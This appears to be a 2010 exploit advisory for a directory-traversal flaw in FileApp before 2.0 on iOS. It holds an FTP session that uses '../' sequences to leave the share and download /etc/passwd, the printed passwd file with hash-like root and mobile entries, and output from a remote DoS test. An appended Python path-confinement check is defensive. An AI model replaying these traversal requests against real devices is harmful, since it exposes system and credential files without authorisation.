[remote exploits] - FileApp < 2.0 for iPhone, iPad and iP
Posted on 02 October 2010
=================================================================
FileApp < 2.0 for iPhone, iPad and iPod Touch Directory Traversal
=================================================================

# Title     : FileApp < 2.0 directory traversal for iPhone,iPod,iPad
# Date      : 02/10/2010
# Author    : m0ebiusc0de
# Software  : http://www.digidna.net/products/fileapp/download
# Version   : FileApp < v.2.0, iPad 3.2.2 (jailed)
# Tested on : Windows XP PRO SP3

[+][+] 0x01. Directory Traversal PoC [+][+]

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>ftp
ftp> open
To 192.168.1.100 2121
Connected to 192.168.1.100.
220 FileApp - FTP Server
User (192.168.1.100:(none)):
331 Password please.
Password:
230 User logged in.
ftp> dir
200 PORT 192.168.1.106:46885 OK
150 BINARY data connection established.
drwxr-xr-x 2 501 501 1564 Sep 29 18:10 Start Here
-rw-r--r-- 1 501 501 1335 Sep 29 13:42 a.html
226 Directory list has been submitted.
ftp: 122 bytes received in 0.00Seconds 122000.00Kbytes/sec.
ftp> cd ../../../../../../
250 OK
ftp> dir
200 PORT 192.168.1.106:46887 OK
150 BINARY data connection established.
drwxrwxr-x 19 0 80 646 Aug 5 14:18 Applications
drwxrwxr-x 2 0 80 68 May 29 08:51 Developer
drwxrwxr-x 15 0 80 646 Aug 5 14:18 Library
drwxr-xr-x 3 0 0 102 May 29 08:56 System
drwxr-xr-x 2 0 0 102 Aug 5 14:23 bin
drwxrwxr-x 2 0 80 68 Jan 16 03:56 cores
dr-xr-xr-x 3 0 0 1353 Oct 2 17:58 dev
lrwxrwxrwx 1 0 80 11 Aug 5 14:18 etc -> private/etc
drwxr-xr-x 4 0 0 136 Sep 12 20:06 private
drwxr-xr-x 2 0 0 442 Aug 5 14:23 sbin
drwxr-xr-x 7 0 0 238 Aug 5 14:11 usr
lrwxrwxrwx 1 0 80 11 Aug 5 14:18 var -> private/var
226 Directory list has been submitted.
ftp: 716 bytes received in 0.02Seconds 44.75Kbytes/sec.
ftp> cd ../../../../../../etc/
250 OK
ftp> dir
200 PORT 192.168.1.106:46888 OK
150 BINARY data connection established.
drwxr-xr-x 2 0 0 272 May 29 09:06 bluetool
-rw-r--r-- 1 0 0 78 Sep 12 20:06 fstab
-rw-r--r-- 1 0 0 1262 Jan 16 03:56 group
-rw-r--r-- 1 0 0 236 Jan 16 03:56 hosts
-rw-r--r-- 1 0 0 0 Jan 16 03:56 hosts.equiv
-rw-r--r-- 1 0 0 53 Jan 16 03:56 networks
-rw-r--r-- 1 0 0 132 May 29 07:12 notify.conf
-rw-r--r-- 1 0 0 611 Jan 16 03:56 passwd
drwxr-xr-x 2 0 0 68 Aug 5 10:15 ppp
-rw-r--r-- 1 0 0 5766 Jan 16 03:56 protocols
drwxr-xr-x 3 0 0 170 May 29 08:03 racoon
-rw-r--r-- 1 0 0 677959 Jan 16 03:56 services
-rw-r--r-- 1 0 0 1367 Jan 16 03:56 ttys
226 Directory list has been submitted.
ftp: 766 bytes received in 0.02Seconds 47.88Kbytes/sec.
ftp> get ../../../../../../etc/passwd
200 PORT 192.168.1.106:46894 OK
150 BINARY data connection established.
226 File transmission successful.
ftp: 611 bytes received in 0.00Seconds 611000.00Kbytes/sec.
ftp> quit
221 Thanks for using FileApp !

C:\Documents and Settings\Administrator>cat passwd
##
# User Database
#
# This file is the authoritative user database.
##
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:/smx7MYTQIi2M:0:0:System Administrator:/var/root:/bin/sh
mobile:/smx7MYTQIi2M:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/empty:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false

C:\Documents and Settings\Administrator>

[+][+] 0x02. Remote DoS PoC TEST [+][+]

C:\Python25>python FileApp_DoS.py 192.168.1.100
[+] Connecting to the target..
[+] Exploited!

C:\Python25>python FileApp_DoS.py 192.168.1.100
[-] Connection error!

C:\Python25>

# Inj3ct0r.com [2010-10-02]
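
A server-side confinement check for the `cd ../../../../../../` and `get ../../../../../../etc/passwd` requests shown in section 0x01, added here as an example; it is not FileApp's code. The names `resolve_ftp_path` and `PathEscape` and the temporary share layout are hypothetical, and the sample tree is constructed.

```python
import os
import posixpath
import tempfile


class PathEscape(Exception):
    """Client path resolves outside the shared root."""


def resolve_ftp_path(root, virtual_cwd, arg):
    """Map a CWD/RETR argument to (virtual_path, real_path) under root."""
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    # 1. Join in the client's virtual namespace and collapse "." / "..".
    #    normpath on an absolute POSIX path clamps ".." at "/".
    virtual = posixpath.normpath(posixpath.join("/", virtual_cwd, arg))
    virtual = "/" + virtual.lstrip("/")
    # 2. Re-anchor the clamped virtual path under the real share root.
    real_root = os.path.realpath(root)
    candidate = os.path.join(real_root, virtual.lstrip("/"))
    # 3. Resolve symlinks and check again: a link stored inside the share
    #    must not lead the server out of it.
    real = os.path.realpath(candidate)
    if os.path.commonpath([real_root, real]) != real_root:
        raise PathEscape(f"{arg!r} resolves outside the shared root")
    return virtual, real


def demo():
    """Replay the session's arguments against a constructed share."""
    with tempfile.TemporaryDirectory() as base:
        share = os.path.join(base, "Documents")   # constructed share root
        os.makedirs(os.path.join(share, "Start Here"))
        outside = os.path.join(base, "etc")       # stands in for /etc
        os.makedirs(outside)
        open(os.path.join(outside, "passwd"), "w").close()
        os.symlink(outside, os.path.join(share, "link"))
        out = {"cd": resolve_ftp_path(share, "/", "../../../../../../")[0]}
        virtual, real = resolve_ftp_path(share, "/", "../../../../../../etc/passwd")
        out["get"] = virtual
        out["confined"] = real.startswith(os.path.realpath(share) + os.sep)
        try:
            resolve_ftp_path(share, "/", "link/passwd")
            out["symlink"] = "allowed"
        except PathEscape:
            out["symlink"] = "rejected"
        return out


if __name__ == "__main__":
    print(demo())
```

With this check the `cd` from the session leaves the client at the share's own `/`, and the `get` maps to `etc/passwd` inside the share rather than the device's file.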